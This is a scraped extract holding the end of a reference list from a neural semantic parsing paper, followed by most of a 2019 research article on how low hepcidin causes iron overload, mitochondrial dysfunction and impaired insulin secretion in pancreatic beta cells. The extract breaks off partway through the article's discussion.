(Volume 1: Long Papers), volume 1, pages 12–22. Mark Johnson and Ewan Klein. 1986. Discourse, anaphora and parsing. In 11th International Conference on Computational Linguistics. Pro- ceedings of Coling ’86, pages 669–675, Univer- sity of Bonn. Nirit Kadmon. 2001. Formal Pragmatics. Blackwell. Hans Kamp. 1984. A theory of truth and se- mantic representation. In Jeroen Groenendijk, Theo M.V. Janssen, and Martin Stokhof, editors, Truth, Interpretation and Information, pages 1–41. FORIS, Dordrecht – Holland/ Cinnaminson – U.S.A. Hans Kamp and Uwe Reyle. 1993. From Dis- course to Logic; An Introduction to Model the- oretic Semantics of Natural Language, Formal Logic and DRT. Kluwer, Dordrecht. Guillaume Klein, Yoon Kim, Yuntian Deng, Jean Senellart, and Alexander Rush. 2017. Open- NMT: Open-source toolkit for neural machine translation. In Proceedings of ACL 2017, Sys- tem Demonstrations, pages 67–72. Association for Computational Linguistics. Ioannis Konstas, Srinivasan Iyer, Mark Yatskar, Yejin Choi, and Luke Zettlemoyer. 2017. Neu- ral AMR: Sequence-to-sequence models for parsing and generation. In Proceedings of the 55th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pages 146–157, Vancouver, Canada. Association for Computational Linguistics. Phong Le and Willem Zuidema. 2012. Learning compositional semantics for open domain se- mantic parsing. Proceedings of COLING 2012, pages 1535–1552. Wang Ling, Phil Blunsom, Edward Grefenstette, Karl Moritz Hermann, Tomáš Kočiskỳ, Fumin Wang, and Andrew Senior. 2016. Latent predictor networks for code generation. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), volume 1, pages 599–609. Jiangming Liu, Shay B. Cohen, and Mirella Lapata. 2018. Discourse representation struc- ture parsing. In Proceedings of the 56th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), volume 1, pages 429–439. Thang Luong, Hieu Pham, and Christopher D. Manning. 2015. Effective approaches to attention-based neural machine translation. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Pro- cessing, pages 1412–1421, Lisbon, Portugal. Association for Computational Linguistics. Reinhard Muskens. 1996. Combining montague semantics and discourse representation. Lin- guistics and Philosophy, 19:143–186. 632 http://www.aclweb.org/anthology/D13-1146 http://www.aclweb.org/anthology/D13-1146 http://www.aclweb.org/anthology/P17-4012 http://www.aclweb.org/anthology/P17-4012 http://www.aclweb.org/anthology/P17-4012 http://aclweb.org/anthology/P17-1014 http://aclweb.org/anthology/P17-1014 http://aclweb.org/anthology/P17-1014 Rik van Noord, Lasha Abzianidze, Hessel Haagsma, and Johan Bos. 2018. Evaluating scoped meaning representations. In Proceed- ings of the Eleventh International Conference on Language Resources and Evaluation (LREC 2018), Paris, France. European Language Re- sources Association (ELRA). Rik van Noord and Johan Bos. 2017a. Dealing with co-reference in neural semantic parsing. In Proceedings of the 2nd Workshop on Semantic Deep Learning (SemDeep-2), pages 41–49. Rik van Noord and Johan Bos. 2017b. Neural semantic parsing by character-based transla- tion: Experiments with abstract meaning rep- resentations. Computational Linguistics in the Netherlands Journal, 7:93–108. Eric W. Noreen. 1989. Computer-intensive Meth- ods for Testing Hypotheses. Wiley New York. Jeffrey Pennington, Richard Socher, and Christopher Manning. 2014. GloVe: Global vectors for word representation. In Proceedings of the 2014 conference on empirical methods in natural language processing (EMNLP), pages 1532–1543. Fernando Pereira and Stuart Shieber. 1987. Prolog and Natural Language Analysis. CSLI Lecture Notes 10. Chicago University Press, Stanford. Rob A. Van der Sandt. 1992. Presupposition projection as anaphora resolution. Journal of Semantics, 9(4):333–377. Rico Sennrich, Barry Haddow, and Alexandra Birch. 2016a. Edinburgh neural machine trans- lation systems for WMT 16. In Proceedings of the First Conference on Machine Transla- tion: Volume 2, Shared Task Papers, volume 2, pages 371–376. Rico Sennrich, Barry Haddow, and Alexandra Birch. 2016b. Neural machine translation of rare words with subword units. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pages 1715–1725, Berlin, Germany. Nitish Srivastava, Geoffrey Hinton, Alex Krizhevsky, Ilya Sutskever, and Ruslan Salakhutdinov. 2014. Dropout: A simple way to prevent neu- ral networks from overfitting. The Journal of Machine Learning Research, 15(1):1929–1958. Ilya Sutskever, Oriol Vinyals, and Quoc V. Le. 2014. Sequence to sequence learning with neu- ral networks. In Z. Ghahramani, M. Welling, C. Cortes, N. D. Lawrence, and K. Q. Weinberger, editors, Advances in Neural Information Pro- cessing Systems 27, pages 3104–3112. Curran Associates, Inc. Antonio Toral and Víctor M. Sánchez-Cartagena. 2017. A multifaceted evaluation of neural versus phrase-based machine translation for 9 language directions. In Proceedings of the 15th Conference of the European Chapter of the Association for Computational Linguistics: Volume 1, Long Papers, pages 1063–1073, Valencia, Spain. Association for Computational Linguistics. Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N. Gomez, Łukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in Neural Information Processing Systems, pages 5998–6008. Hajime Wada and Nicholas Asher. 1986. BUILDRS: An implementation of DR theory and LFG. In 11th International Conference on Computational Linguistics. Proceedings of Coling ’86, pages 540–545, University of Bonn. John M. Zelle and Raymond J. Mooney. 1996. Learning to parse database queries using induc- tive logic programming. In Proceedings of the national conference on artificial intelligence, pages 1050–1055. 633 https://doi.org/10.1093/jos/9.4.333 https://doi.org/10.1093/jos/9.4.333 http://www.aclweb.org/anthology/E17-1100 http://www.aclweb.org/anthology/E17-1100 http://www.aclweb.org/anthology/E17-1100 work_ni24u3psuvbs5nb2fztgr6z4ba ---- 8:3 150–161T Shu, Z Lv et al. Low hepcidin impaired mitochondria function RESEARCH Hepcidin as a key iron regulator mediates glucotoxicity-induced pancreatic β-cell dysfunction Tingting Shu1,*, Zhigang Lv1,*, Yuchun Xie1, Junming Tang2 and Xuhua Mao2 1Department of Central Laboratory, Jiangsu Province Official Hospital, Nanjing, Jiangsu, China 2Department of Clinical Laboratory, Yixing People Hospital, Affiliated Jiangsu University, Yixing, Wuxi, Jiangsu, China Correspondence should be addressed to X Mao: flora7227@hotmail.com *(T Shu and Z Lv contributed equally to this article) Abstract It has been well established that glucotoxicity induces pancreatic β-cells dysfunction; however, the precise mechanism remains unclear. Our previous studies demonstrated that high glucose concentrations are associated with decreased hepcidin expression, which inhibits insulin synthesis. In this study, we focused on the role of low hepcidin level-induced increased iron deposition in β-cells and the relationship between abnormal iron metabolism and β-cell dysfunction. Decreased hepcidin expression increased iron absorption by upregulating transferrin receptor 1 (TfR1) and divalent metal transporter 1 (DMT1) expression, resulting in iron accumulation within cells. Prussia blue stain and calcein-AM assays revealed greater iron accumulation in the cytoplasm of pancreatic tissue isolated from db/db mice, cultured islets and Min6 cells in response to high glucose stimulation. Increased cytosolic iron deposition was associated with greater Fe2+ influx into the mitochondria, which depolarized the mitochondria membrane potential, inhibited ATP synthesis, generated excessive ROS and induced oxidative stress. The toxic effect of excessive iron on mitochondrial function eventually resulted in impaired insulin secretion. The restricted iron content in db/db mice via reduced iron intake or accelerated iron clearance improved blood glucose levels with decreased fasting blood glucose (FBG), fasting blood insulin (FIns), HbA1c level, as well as improved intraperitoneal glucose tolerance test (IPGTT) results. Thus, our study may reveal the mechanism involved in the role of hepcidin in the glucotoxcity impaired pancreatic β cell function pathway. Introduction Hepcidin is synthesized and secreted primarily in the liver and is a key regulator in iron metabolism (1, 2). In 2008, Kulaksiz et al. first reported that hepcidin was expressed in human and rat islet tissues and only existed in insulin-secreting β-cells (3), and then other studies showed low concentration of glucose could stimulate hepcidin secretion in pancreatic beta cell line (4, 5). Subsequently, the correlation between hepcidin and type 2 diabetes (T2DM) has gained increased attention. In addition, several reviews have indicated that hepcidin is an independent risk factor for the onset of T2DM (6, 7, 8). Indeed, the serum hepcidin levels in T2DM patients has been found to be significantly lower than those in healthy individuals (7, 9, 10). However, the mechanism by which hepcidin mediates T2DM pathogenesis remains unclear. Recent reports attribute the probable mechanism to the induction of peripheral tissue insulin resistance (11) through inflammatory response, oxidative stress (12) and -18-0516 Key Words f T2DM f hepcidin f iron overload f pancreatic dysfunction Endocrine Connections (2019) 8, 150–161 ID: 18-0516 8 3 This work is licensed under a Creative Commons Attribution 4.0 International License.https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:24PM via free access mailto:flora7227@hotmail.com http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com T Shu, Z Lv et al. Low hepcidin impaired mitochondria function 151 PB–12 8:3 mitochondrial dysfunction pathways (13), which affect glucose metabolism in peripheral tissues (5). To date, there have been few reports describing the role of hepcidin in pancreatic β-cells. Our previous results confirmed that the level of hepcidin was decreased under conditions of high glucose stimulation and had a disrupted effect on insulin secretion (14). In addition, the iron status induced by decreased hepcidin expression and its possible toxic effect on β-cell function must be further evaluated and explored. The lower level of hepcidin could cause iron overload by preventing iron exportation or increase iron intake (15, 16). The deposition of iron in the cytosol is pumped into mitochondria via the ion transporter mitochondrial substrate carrier family protein (Mcfu) (17, 18). As a divalent positively charged ion, Fe2+ depolarizes the mitochondria membrane potential, resulting in a disruption of the electron transport chain (ETC), (19) which influences the energy supply required for insulin secretion (20). Moreover, mitochondrial function becomes impaired, which induces endoplasmic reticulum stress response (ER stress), leading to β-cell apoptosis (21, 22). In the situation described earlier, we believe that the iron overload in β-cells induced by low hepcidin levels plays an important role in the process of glucotoxicity-mediated depression of β-cell function. In this study, we aimed to clarify the iron overload status in the cytosol and mitochondria using the Min6 cell line, pancreatic islets and db/db mice, as well as discuss the probable mechanism by which iron toxicity influences mitochondrial function. To this end, we used db/db mice to study the effect of restricting iron content on blood glucose levels by decreasing iron intake or accelerating iron clearance. Materials and methods Cell culture The mouse pancreatic β-cell line, Min6 (passage 15–28 was kindly providing by department of islet β-cell function laboratory, Jiangsu Province Official Hospital), was cultured in Dulbecco’s modified Eagles medium (Invitrogen) containing 25 mM glucose and supplemented with 15% fetal bovine serum (Invitrogen). The media was supplemented with 100 μg/mL streptomycin, 100 U/mL penicillin and 50 μmol/L β-mercaptoethanol. The cells were maintained at 37°C in a humidified incubator under 5% CO2/95% air. Virus construction and gene infected The mouse hepcidin-expressing plasmid was constructed by inserting the full-length coding region of hepcidin (ID:84506) into pCDNA 3.0 vector, and then cut from pCDNA 3.0 ligated into Ad-track vector (Ad-hepcidin) and sequenced to confirm. For gene transfer, adenovirus generation, amplification and titration were performed. Viral particles were purified using the Adenovirus Purification Kit (Cell Biolabs, San Diego, CA, USA). Min6 cells were infected with adenovirus at a multiplicity of infection of 50 at 37°C and, 2 h after infection, the cells were cultured in fresh medium for another 18 h before treating with glucose (Sigma-Aldrich) treatment. Use Ad-Gfp virus as control. Pancreatic islet isolation All animal studies were performed according to guidelines established by the Research Animal Care Committee of Nanjing Medical University. Animals used for islet isolation (8-week-old C57BL/6 mice) were purchased from the National Resource Center. Islets were isolated and cultured as previously described (23). Insulin immunofluorescence was performed to identify the islet cells (Supplementary Fig. 1, see section on supplementary data given at the end of this article). GSIS assay The GSIS assay was performed as previously described (14) – isolated mouse islets and Min6 cells were transferred into 48-well plates (10 islets/well; 104 cells/well) and treated with different concentrations of glucose. Insulin content was assessed using a commercial ELISA kit (ALPCO Diagnostics) (24) in accordance with the manufacturer’s instructions. Hepcidin and ferritin content analysis The hepcidin content of both the islets and culture supernatants was determined using a commercial ELISA kit purchased from DRG Instruments (GmbH, Marburg, Germany) according to the manufacturer’s protocol. The db/db mice and their littermate control mice’ blood ferritin levels were measured using a commercial ELISA kit purchased from Monobind (Lake Forest, CA, USA) according to the manufacturer’s instructions. This work is licensed under a Creative Commons Attribution 4.0 International License.https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:24PM via free access http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com T Shu, Z Lv et al. Low hepcidin impaired mitochondria function 1528:3 RNA extraction, reverse transcription and qRT-PCR Total RNA was extracted using TRIzol reagent (Invitrogen) according to the manufacturer’s protocol. Reverse transcription was performed using One- Step RT-PCR System (Invitrogen). SYBR Green Real- time PCR Master Mix (Invitrogen) and Light Cycler 480 II Sequence Detection System (Roche) were used for qRT-PCR, and mRNA levels were normalized to β-actin. The sequences of the primers used for qRT-PCR are listed in Supplementary Table 1. Western blotting Cells were immediately washed with ice-cold phosphate buffered saline (PBS) and lysed with lysis buffer containing 50 mM Tris–HCl (pH 8.0), 150 mM NaCl, 0.02% sodium azide, 0.1% SDS, 1 μg/mL aprotinin, 1% NP-40, 1% deoxycholic acid sodium salt and 100 μg/mL PMSF. Cell debris was removed by centrifugation (12,000 g at 4°C for 20 min). The protein concentration was determined using a DC Protein Assay Kit (Bio-Rad), and the protein samples were separated by SDS-PAGE, transferred to Immune-Blot PVDF membranes (Bio-Rad) and incubated at 4°C overnight with rabbit anti-DMT1 (divalent metal transporter 1); rabbit anti-TfR1 (transferrin receptor 1) (Santa Cruz). The membranes were then incubated at room temperature with rabbit anti-β-action antibodies (Santa Cruz) for 1 h and analyzed using the ECL (enhanced chemiluminescence) purchased from Sigma-Aldrich. Fluorescence in situ hybridization (FISH) Pancreatic tissues isolated from control and db/db mice were fixed in 40 mg/mL in paraformaldehyde and frozen in OCT compound (Sakura, Coronado, CA, USA). For FISH, the probe mixture was dissolved in hybridization buffer (10% dextran sulfate, 2 mM vanadyl-ribonucleoside complex, 0.02% BSA, 2 × SSC, and 10% formamide) and added to the tissue sections for an overnight incubation at 37°C. The probe sequences are listed in Supplementary Table 2. After incubating with the secondary antibodies, images were obtained and analyzed using IX73 fluorescence microscope (Olympus). Cytosolic chelatable iron assay To visualize cytosol iron mobilization of Min6 cells, the cells were grown in 96-well plates and co-loaded with diluted calcein-AM purchased from Life Technologies. The total volume of the culture medium per well for a 96-well plate was 200 µL, which included 100 µL of the initial culture medium, 50 µL of the test compound and 50 µL calcein-AM; all the wells contained 0.1% DMSO. Both fluorescent and phase-contrast images were taken using a fluorescence microscope (Olympus) at the indicated time intervals. Compounds that autofluoresced were excluded. Quenching of calcein-AM fluorescence signifies an increase in cytosolic chelatable Fe2+. Prussian blue staining Pancreatic tissues and isolated islet cells from control and db/db mice were stained with Perls’ reagent (Sigma) to identify the presence of iron particles. The sections and cells were incubated with Perl’s reagent with 1:1 mixture of 2% potassium ferrocyanide and 1% hydrochloric acid for 30 min at room temperature. The slides were counterstained using nuclear fast red. Prussian blue- positive cells were examined using an Olympus light microscope and photographed. ROS determination Intracellular ROS were measured by flow cytometry using 2, 7-dichlorofluorescein diacetate (DCFH-DA) (BD, Franklin Lakes, NJ, USA) as a probe. After treating the cells with different concentrations of glucose, the cells were washed twice with PBS and co-incubated with serum- free RPMI 1640 containing 10 μM DCFH-DA for 30 min at 37°C in the dark and washed twice with PBS. ROS were measured using Canton II flow cytometer (BD), at 488 nm excitation and 525 nm emission. The data were recorded using Diva software (BD). Determination of mitochondrial membrane potential (Δψm) We followed the methods of Qiao et al. 2015 (25). The Δψm in Min6 cells was measured using a MitoScreen (JC-1) kit (BD). The cells were harvested and incubated with JC-1 at 37°C for 15−20 min, after which the staining solution was removed, washed and re-suspended in PBS. The samples were then analyzed with a Canton II flow cytometer (BD). The loss of Δψm was reflected by increased green fluorescence from the JC-1 monomers, as well as a loss of red fluorescence from the JC-1 aggregates. This work is licensed under a Creative Commons Attribution 4.0 International License.https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:24PM via free access http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com T Shu, Z Lv et al. Low hepcidin impaired mitochondria function 153 PB–12 8:3 Determination of adenosine 5′-triphosphate (ATP) release ATP release from the cultured cell lines was measured using a commercially available rLuciferase/Luciferin (rL/L) reagent assay (Promega Enliten). Briefly, the samples were neutralized to pH 7.4 with 10 μL 4M Tris and were aliquoted to a new tube with 90 μL ATP-free water. Luciferase reagent was added 1 s before measurement in the 20/20n Luminometer Turner BioSystems (Sunnyvale, CA, USA). An ATP standard curve was constructed, and all samples were measured in duplicate. To ensure a low background, a ‘blank’ containing only rL/L reagent and HBSS was analyzed. ATP concentrations were determined by comparison to a standard curve. Animals, treatment and blood parameter determination Male, four-week-old db/db mice and their littermate controls were purchased from Shanghai Laboratory Animal Centre (Shanghai, China). All mice were housed in cages and maintained on a 12 h light/darkness cycle with free access to food and water. The mice were raised for 7 weeks, during which time they were fed a normal chow diet (iron content: 350–600 mg/kg), low iron chow diet (iron content: 35 mg/kg) or a normal chow diet plus iron chelator. The mouse chow were purchased from Harlan Teklad (Madison, WI, USA) (26). Iron chelator referred to as FBS0701 was purchased from FerroKin BioSciences (San Carlos, CA, USA), a magnesium salt of (S)-3´-(OH)-DADFT (27). Drug was dosed at 10 mg/kg, provided once a day. The db/db mice were divided into four groups (10 mice/group): (1) db/db; (2) db/db + low iron diet; (3) db/db + iron chelator and (4) littermate control mice. Body weight and fasting blood glucose (FBG) were monitored weekly, with FBG levels determined 4 h after removing food. Fasting blood insulin (FIns), HbA1c% and an intraperitoneal glucose tolerance test (IPGTT) were monitored at 4 and 10 weeks. HbA1c% was estimated via liquid chromatography (Sysmex, Tokyo, Japan). IPGTT was performed in the morning with an intraperitoneal injection of 1 g/kg glucose after 12-h fasting. Blood glucose levels were measured at 0, 15, 30, 60 and 120 min and the area under the curve (AUC) for blood glucose was analyzed with Graphpad Prism 6. All animal experimental procedures were performed in accordance with the guidelines established by the Research Animal Care Committee of Nanjing Medical University. Statistical analysis Results are presented as means ± standard error of the mean (s.e.m.). Comparisons between pairs of groups were performed using Student’s t-test or using ANOVA for comparisons of multiple groups with SPSS 20.0 software. P values <0.05 were considered to indicate statistical significance. Results Hyperglycemia inhibits hepcidin expression in db/db mice, cultured mouse islets and Min6 cells Hepcidin is expressed in pancreatic β-cells and can be released by secretory granules under glucose stimulation (14). To assess the effect of hyperglycemia on hepcidin expression, we determined the level of hepcidin mRNA expression, protein and secretion content level in db/db mouse islets, high glucose cultured mouse islets and Min6 cells. Double immunofluorescent analysis was performed to determine the level of insulin-1 and hepcidin expression. Pancreatic islets of the mouse in the control group strongly expressed insulin-1 (red) and hepcidin (green), whereas in the db/db group, both insulin-1 and hepcidin expression were substantially decreased (Fig. 1A). Both the hepcidin mRNA level and secretion content decreased in isolated islets following high glucose stimulation (Fig. 1B and C). To explore whether hyperglycemia impaired GSIS function was related to the low level of hepcidin, we infected an Ad-hepcidin virus to Min6 cells. The hepcidin mRNA level was determined to confirm the expression efficiency (Supplementary Fig. 2). The GSIS function was significantly restored compared with Ad-Gfp group (P < 0.01) (Fig. 1D). Low hepcidin expression induces iron overload in pancreatic β-cells Hepcidin plays a key role in iron homeostasis (28). Using a Prussia blue stain assay, we assessed the iron content in isolated mouse islets cultured under high glucose conditions. Consistent with our expectations, the iron content increased in a dose-dependent manner with an increase of glucose concentration stimulation as indicated by the blue-stained spots (Fig. 2A). To visualize iron mobilization into the cytosol under hyperglycemia stimulation, Min6 cells were co-loaded with calcein-AM. This work is licensed under a Creative Commons Attribution 4.0 International License.https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:24PM via free access http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com T Shu, Z Lv et al. Low hepcidin impaired mitochondria function 1548:3 Quenching of calcein fluorescence signified an increase in the level of cytosolic chelatable iron. The fluorescence intensity was strongly decreased in the 33.3 mM glucose stimulation group but partially recovered with Ad-hepcidin-infected group (Fig. 2B). There was no statistically significant difference in fluorescence intensity between the 33.3 mM group and the 33.3 mM + Ad-Gfp group at each time point (P = 0.52). The cytosolic iron overload probably due to iron intake increase via divalent metal transporter (DMT-1) and transferrin receptor 1 (TfR1) protein level increased (Fig. 2C). Iron aggregation induces ROS generation which impairs mitochondria function The excess iron in the cytoplasm could be transported into mitochondria via the mitochondrial uniporter (Mcfu). The effect of iron toxicity on mitochondria is associated with the mitochondrial production of OH··radicals according to the Fenton reaction mechanism (Fe2 + H2O2→Fe 3+ + (OH)− + OH·) (29). As expected, hyperglycemia increased the level of ROS in Min6 cells (Fig. 3A). To determine if this increase in ROS was mediated by an iron overload, we pretreated cells with an iron scavenger (iron chelator), Mcfu inhibitor (Ru360) or infected Ad-hepcidin virus and subjected the cells to high glucose stimulation. The ROS content decreased in all groups compared with the 33.3 mM glucose treatment group (Fig. 3B). There was no statistically significant difference in ROS content between the 33.3 mM group and the 33.3 mM + Ad-Gfp group (P = 0.38), nor was there any statistically significant difference between the control, Ad-hepcidin, Ru 360 and iron chelator groups (Supplementary Fig. 3). Figure 1 The level of hepcidin expression in control mice and db/db mice pancreatic tissue (A). Relative mRNA levels of hepcidin were quantified using qRT-PCR analysis with β-actin as an internal control in isolated islets with different concentrations of glucose treatment for 48 h. ** indicate P < 0.01 compared with the control group (B). Hepcidin content was analyzed in isolated islets using an ELISA method with different concentration of glucose treatment for 48 h. ** indicate P < 0.01 compared with the control group (C). GSIS was measured as insulin secretion normalized to the insulin content with an ELISA method in Min6 cell with different concentrations of glucose treatment for 48 h. ** indicate P < 0.01 in the Ad-hepcidin-infected group compared with the Ad-Gfp-infected group with 33.3 mM glucose treatment (D). Values are expressed as the means ± s.d. and are representative of three individual experiments. This work is licensed under a Creative Commons Attribution 4.0 International License.https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:24PM via free access http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com T Shu, Z Lv et al. Low hepcidin impaired mitochondria function 155 PB–12 8:3 Excess mitochondrial iron induces ΔΨm depolarization and inhibits ATP synthesis Excess Fe2+ transported into mitochondria causes inner membrane depolarization which inhibited oxidative respiratory chain and electron transfer, and ATP generation is depressed. The mitochondrial membrane potential was analyzed by JC-1 staining. The results indicate an obvious disruption of the mitochondrial membrane potential in Min6 cells under hyperglycemia stimulation (Fig. 4A). The iron content in cytoplasm was corrected by pretreating cells with an iron chelator, Ru360 and infected Ad-hepcidin virus. The ratio of red fluorescence/green fluorescence was increased compared with the hyperglycemia stimulation group (Fig. 4B). Similarly, when the ATP content was observed, hyperglycemia decreased ATP content (Fig. 4C), whereas treatment with the iron chelator, Ru360, and overexpression of hepcidin could recover the level of ATP (Fig. 4D). There was no statistically significant difference in the ratio of red fluorescence/green fluorescence and ATP content between the 33.3 mM group and the 33.3 mM + Ad-Gfp group (P = 0.28, P = 0.37), nor was there any statistically significant difference between the control, Ad-hepcidin, Ru 360 and iron chelator groups (Supplementary Fig. 4). Figure 2 The iron content measured by Prussian blue staining in isolated mouse islets stimulated with different concentrations of glucose for 48 h (A). Cytosolic iron mobilization was measured with calcein-AM fluorescence staining in Min6 cells with different treatments for 48 h. Quenching of calcein-AM fluorescence signifies an increase in cytosolic chelatable Fe2+. Fluorescence% was quantified as the area under the curve (AUC) from cytosolic calcein fluorescence%.*indicate P < 0.05 compared with the control group; △indicated P < 0.05 compared with the 33.3 mM treatment group (B). DMT1 and TfR1 proteins were extracted from Min6 cells with different concentration of glucose treatment for 48 h, analyzed by Western blot; the right panel showed the relative quantification of the normalized DMT1; TfR1 levels to β-actin. Values are expressed as the means ± s.d. and are representative of three individual experiments. *indicate P < 0.05 compared with the control group (C). This work is licensed under a Creative Commons Attribution 4.0 International License.https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:24PM via free access http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com T Shu, Z Lv et al. Low hepcidin impaired mitochondria function 1568:3 Effects of iron restriction on blood glucose levels and insulin levels in db/db mice The results presented in the current manuscript suggest that lower hepcidin expression eventually leads to decreased insulin release (Fig. 1). In this case, we restricted the iron content of db/db mice by feeding the animals low iron chow or normal chow + iron chelator. An analysis of body weight, FBG, IPGTT, HbA1C% and FIns were performed. At 4 weeks, the FBG of db/db mice just started to raise compared with control group (Fig. 5B). There is no differences between the db/db animals under different treatment conditions (4 weeks).The mice on the low iron chow and iron chelator gained less weight than the db/db mice but remained significantly obese compared to the control mice (P < 0.01, Fig. 5A). Since body weight is a major determinant of the glucose tolerance status, we next studied whether these differences in weight might improve glucose tolerance. In the iron chelator and low iron chow groups, the IPGTT was higher compared with control group but was much improved compared to the db/db group, which is consistent with the relationship with body weight (Fig. 5C). We also observed a partial reversion on FBG, HbA1C% and FIns in the iron chelator and low iron chow groups when compared to control db/db mice (Fig. 5C, D and E). There was no difference of FBG, IPGTT, HbA1C% and FIns in control mice with normal chow or low iron chow or iron chelator except of body weight at 10 weeks (Supplementary Fig. 5). Iron restriction was associated with a considerable benefit in the blood glucose control. We adopted ferritin to judge the level of serum iron content in the mice. In the iron chelator and low iron chow groups, the ferritin level was slightly higher compared with the control group but was much improved compared to the db/db group (Fig. 5F). The linear regression models to reveal the relationship between iron content and FBG, IPGTT, HbA1C% and FIns. As expected, the higher of ferritin level, the worse of blood glucose level of mice (Fig. 5G, H, I and J). Discussion Our previous study demonstrated that in addition to its role on iron regulation, hepcidin is involved in glucotoxicity-mediated impairment of pancreatic β-cell function by inhibiting insulin synthesis (14). Under hyperglycemic conditions, the expression of hepcidin was inhibited and the iron metabolism balance was disrupted. However, whether this iron metabolism disorder is related to the failure of β-cell function remains unknown. In the present study, we clearly demonstrated that a low expression of hepcidin leads to an iron overload in β-cells, a portion of excess Fe2+ that accumulates in Figure 3 The level of ROS was measured by DCFH-DA staining and flow cytometry analysis following treatment with different concentrations of glucose for 48 h in Min6 cells. Statistical graph of DCFH-DA green fluorescence-positive cells as the fold change compared to the control. **indicate P < 0.01 compared with the control group (A). Min6 cells were infected with Ad-hepcidin or treated with RU 360 or an iron chelator plus 33.3 mM glucose. The level of ROS was measured via DCFH-DA staining and flow cytometry. △△indicate P < 0.01 compared with the 33.3 mM glucose group (B). This work is licensed under a Creative Commons Attribution 4.0 International License.https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:24PM via free access http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com T Shu, Z Lv et al. Low hepcidin impaired mitochondria function 157 PB–12 8:3 the cytoplasm is stored in a stable complex as ferritin (2, 5), whereas the other portion is pumped into the mitochondria via Mcfu (17, 30). In the mitochondria, the accumulation of Fe2+ can impair mitochondrial function through: (1) the generation of a large amount of ROS via the Fenton/Haber–Weiss mechanism (Fe2+ + H2O2 → Fe 3+ + (OH)− + OH•) (18, 29); and (2) ΔΨm depolarization, which affects electron transport, damaging the mitochondrial aerobic respiratory pathway, and inhibiting ATP synthesis (31, 32). All of these toxic effects could be reversed by Ad-hepcidin infected, Ru360, and an iron chelator. GSIS function was also improved with a recovery in hepcidin levels. Our data clearly indicate that iron overload plays an important role in the mitochondria dysfunction mediated β-cell function under conditions of hyperglycemia (Fig. 6). The regulation of hepcidin on iron metabolism mainly through iron absorption and iron exported pathway and was different in each tissue. Hepcidin-knockout mice develop iron overload in the liver and pancreas, but iron deficit in the macrophage-rich spleen (33). There should be a negative correlation between the iron content and ferroportin (FPN) expression level. However, we didn’t observe the high expression of FPN associated with low hepcidin expression in Min6 cells with 33.3 mM glucose stimulated 48 h (data not shown). We presumed the mechanism that hepcidin internalized FPN leading to its degradation clarified in other cell types was not conserved in pancreatic beta cell. There were several evidence supported our presumption. First FPN exported iron primarily from duodenal enterocytes, reticuloendothelial and macrophages. Although FPN was the main receptor for hepcidin and exercising the duty to iron exported, the mechanism of its action to hepcidin in other cells was not clearly understood (1). Second, there was not a connection between iron overload and FPN up-expression but with increased iron intake in Hansen’s work (34) which also confirmed by our study with high glucose stimulation, the DMT and TfR1 protein expression was increased (as Fig. 2C showed). This results indicated iron intake may involve in this process, but the specific molecular was not understand now. Figure 4 The ΔΨm was measured by JC-1 staining and flow cytometry analysis following treatment with different glucose concentrations for 48 h in Min6 cells. Statistical percentage of JC-1 red fluorescence and green fluorescence is shown in picture (A). Min6 cells were infected with Ad-hepcidin or treated with RU 360 or iron chelator plus 33.3 mM glucose. The ΔΨm was measured by JC-1 staining and flow cytometry analysis (B). The ATP content was measured by ATP fluorescence analysis following treatment with various glucose concentrations for 48 h in Min6 cells. ** indicate P < 0.01 compared with the control group (C). Min6 cells were infected with Ad-hepcidin or treated with RU 360 or iron chelator plus 33.3 mM glucose and the level of ATP was measured. △△ indicate P < 0.01 compared with the 33.3 mM glucose group (D). This work is licensed under a Creative Commons Attribution 4.0 International License.https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:24PM via free access http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://doi.org/10.1530/EC-18-0516 https://ec.bioscientifica.com T Shu, Z 